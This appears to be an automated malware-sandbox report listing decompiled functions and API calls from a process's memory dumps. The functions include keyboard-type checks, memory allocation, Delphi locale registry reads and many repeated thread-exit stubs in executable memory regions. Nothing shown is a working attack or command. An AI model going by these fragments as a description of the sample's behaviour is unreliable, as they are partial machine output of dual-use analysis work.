                                                                                                            • Instruction Fuzzy Hash: F1117771B15119EFCB00DFA9DA44A8EB7F8EF58214B204966FA09DB200E634EE00E761
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 50483558, Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E50483558() {
				int _t1;
				signed int _t4;
				int _t5;

				_t5 = 0;
				_t1 = GetKeyboardType(0); // executed
				if(_t1 == 7) {
					_t4 = GetKeyboardType(1) & 0x0000ff00;
					if(_t4 == 0xd00 || _t4 == 0x400) {
						_t5 = 1;
					}
				}
				return _t5;
			}






                                                                                                            0x50483559
                                                                                                            0x5048355d
                                                                                                            0x50483565
                                                                                                            0x5048356e
                                                                                                            0x50483578
                                                                                                            0x50483581
                                                                                                            0x50483581
                                                                                                            0x50483578
                                                                                                            0x50483586

                                                                                                            APIs
                                                                                                            • GetKeyboardType.USER32(00000000), ref: 5048355D
                                                                                                            • GetKeyboardType.USER32(00000001), ref: 50483569
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: KeyboardType
                                                                                                            • String ID:
                                                                                                            • API String ID: 1620330385-0
                                                                                                            • Opcode ID: 3abda0efe1a447a46643a35925134895fb0dc59df20db972b0bc10d38a8c27a4
                                                                                                            • Instruction ID: a9aec066f022d97b7c10246dfac81eb0c744fcc9ac999065bd8961519b0c1ce3
                                                                                                            • Opcode Fuzzy Hash: 3abda0efe1a447a46643a35925134895fb0dc59df20db972b0bc10d38a8c27a4
                                                                                                            • Instruction Fuzzy Hash: E3D012D1A5A1013DFF3404E488C279A40008F2132BF100F3FE206D5BC2C48DA9442192
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03580000, Relevance: 3.0, APIs: 2, Instructions: 16sleeplibraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(?), ref: 0358001D
                                                                                                            • Sleep.KERNELBASE(FFFFFFFF), ref: 03580026
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760995124.0000000003580000.00000040.00000001.sdmp, Offset: 03580000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoadSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 2118945035-0
                                                                                                            • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                                                                                            • Instruction ID: c70f218ab9b01cb2462b859e89c282d33632c52c977b6d27e5888218f8ecb8bb
                                                                                                            • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                                                                                            • Instruction Fuzzy Hash: 75E00274D04608EFCB04DF99C98889DBBB5AF89320B25C295E865A73A5D730AE419A80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 50481594, Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E50481594(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E504813B8(0x504955e4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                                                                                            0x50481597
                                                                                                            0x504815a1
                                                                                                            0x504815b0
                                                                                                            0x504815a3
                                                                                                            0x504815a3
                                                                                                            0x504815a3
                                                                                                            0x504815b6
                                                                                                            0x504815c3
                                                                                                            0x504815c8
                                                                                                            0x504815ca
                                                                                                            0x504815ce
                                                                                                            0x504815d7
                                                                                                            0x504815de
                                                                                                            0x504815ea
                                                                                                            0x504815f1
                                                                                                            0x00000000
                                                                                                            0x504815f1
                                                                                                            0x504815de
                                                                                                            0x504815f6

                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,50481927), ref: 504815C3
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,50481927), ref: 504815EA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$AllocFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 2087232378-0
                                                                                                            • Opcode ID: a50794e85e52f82bf96a9fe1504fc056b4cba8d9412ca2876776edfca42261f8
                                                                                                            • Instruction ID: b91907a457c1fad91e49fec11d3780ab615637fc93d6f837752b7116b1b8ead0
                                                                                                            • Opcode Fuzzy Hash: a50794e85e52f82bf96a9fe1504fc056b4cba8d9412ca2876776edfca42261f8
                                                                                                            • Instruction Fuzzy Hash: 63F0E972A012206AE71055A94C85F8256889F85790F194777FD08EF3D8D7A58C014291
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 50485124, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E50485124(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x50480000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E504853B8(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x50480000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x50480000
				return  *_t7;
			}








                                                                                                            0x5048512c
                                                                                                            0x50485132
                                                                                                            0x5048513e
                                                                                                            0x50485142
                                                                                                            0x5048514b
                                                                                                            0x50485150
                                                                                                            0x50485152
                                                                                                            0x50485157
                                                                                                            0x50485159
                                                                                                            0x5048515c
                                                                                                            0x5048515c
                                                                                                            0x50485157
                                                                                                            0x5048515f
                                                                                                            0x5048516a

                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(50480000,?,00000105), ref: 50485142
                                                                                                              • Part of subcall function 504853B8: GetModuleFileNameA.KERNEL32(00000000,?,00000105,504940C4), ref: 504853D3
                                                                                                              • Part of subcall function 504853B8: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,504940C4), ref: 504853F1
                                                                                                              • Part of subcall function 504853B8: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,504940C4), ref: 5048540F
                                                                                                              • Part of subcall function 504853B8: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 5048542D
                                                                                                              • Part of subcall function 504853B8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,504854BC,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 50485476
                                                                                                              • Part of subcall function 504853B8: RegQueryValueExA.ADVAPI32(?,50485638,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,504854BC,?,80000001), ref: 50485494
                                                                                                              • Part of subcall function 504853B8: RegCloseKey.ADVAPI32(?,504854C3,00000000,?,?,00000000,504854BC,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 504854B6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                            • String ID:
                                                                                                            • API String ID: 2796650324-0
                                                                                                            • Opcode ID: 19019536444cde1791394931edf0689fbb3a6148c745fa19ea62fe5365a4a6c9
                                                                                                            • Instruction ID: ed2b4592be46788f4139e966b2b1714c33c567f787e608bf29ac471646ae07bf
                                                                                                            • Opcode Fuzzy Hash: 19019536444cde1791394931edf0689fbb3a6148c745fa19ea62fe5365a4a6c9
                                                                                                            • Instruction Fuzzy Hash: E0E06DB1A013148BCB04DE9888C5A8637D8AF08754F440B96ED69DF34BD3B4DD1087D1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 056E0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 056E0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761453439.00000000056E0000.00000040.00000001.sdmp, Offset: 056E0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 055E0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 055E0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761411852.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00460000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00460023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.759495620.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 063C0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 063C0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.763101147.00000000063C0000.00000040.00000001.sdmp, Offset: 063C0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03550000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 03550023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760977656.0000000003550000.00000040.00000001.sdmp, Offset: 03550000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03350000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 03350023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760860046.0000000003350000.00000040.00000001.sdmp, Offset: 03350000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06050000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 06050023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.762700236.0000000006050000.00000040.00000001.sdmp, Offset: 06050000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05910000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05910023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761517197.0000000005910000.00000040.00000001.sdmp, Offset: 05910000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03780000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 03780023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761106637.0000000003780000.00000040.00000001.sdmp, Offset: 03780000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01240000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 01240023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760228754.0000000001240000.00000040.00000001.sdmp, Offset: 01240000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 034D0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 034D0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760940877.00000000034D0000.00000040.00000001.sdmp, Offset: 034D0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00C40000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00C40023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.759959085.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01040000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 01040023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760121892.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05E50000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05E50023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.762496273.0000000005E50000.00000040.00000001.sdmp, Offset: 05E50000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05C50000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05C50023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761672142.0000000005C50000.00000040.00000001.sdmp, Offset: 05C50000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 053B0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 053B0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761334994.00000000053B0000.00000040.00000001.sdmp, Offset: 053B0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E40000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00E40023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760044938.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 051B0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 051B0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761247110.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06480000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 06480023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.763135617.0000000006480000.00000040.00000001.sdmp, Offset: 06480000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

